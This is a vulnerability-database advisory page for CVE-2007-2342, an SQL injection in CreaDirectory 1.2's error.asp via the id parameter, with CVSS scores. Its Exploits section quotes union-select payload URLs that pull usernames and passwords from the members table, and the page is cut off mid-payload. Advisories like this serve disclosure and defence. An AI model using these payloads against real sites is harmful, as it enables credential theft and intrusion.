7.5
CVSSv2

CVE-2007-2342

Published: 27/04/2007 Updated: 11/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in error.asp in CreaScripts CreaDirectory 1.2 allows remote malicious users to execute arbitrary SQL commands via the id parameter, a different vector than CVE-2006-6083.

Vulnerable Product Search on Vulmon Subscribe to Product

creascripts creadirectory 1.2

Exploits

#Title : CreaDirectory v12 Remote SQL Injection Vulnerability #Author : CyberGhost #Demo Page : wwwcreadirectorycom #Script Page : wwwcreascriptscom/creadirectoryasp #Vuln #Username : /errorasp?id=-1+union+select+0,1,2,user_name,4,5,6,7,8,9,0,1,2,3,4,5+from+members #Password : /errorasp?id=-1+union+select+0,1,2,ipassword ...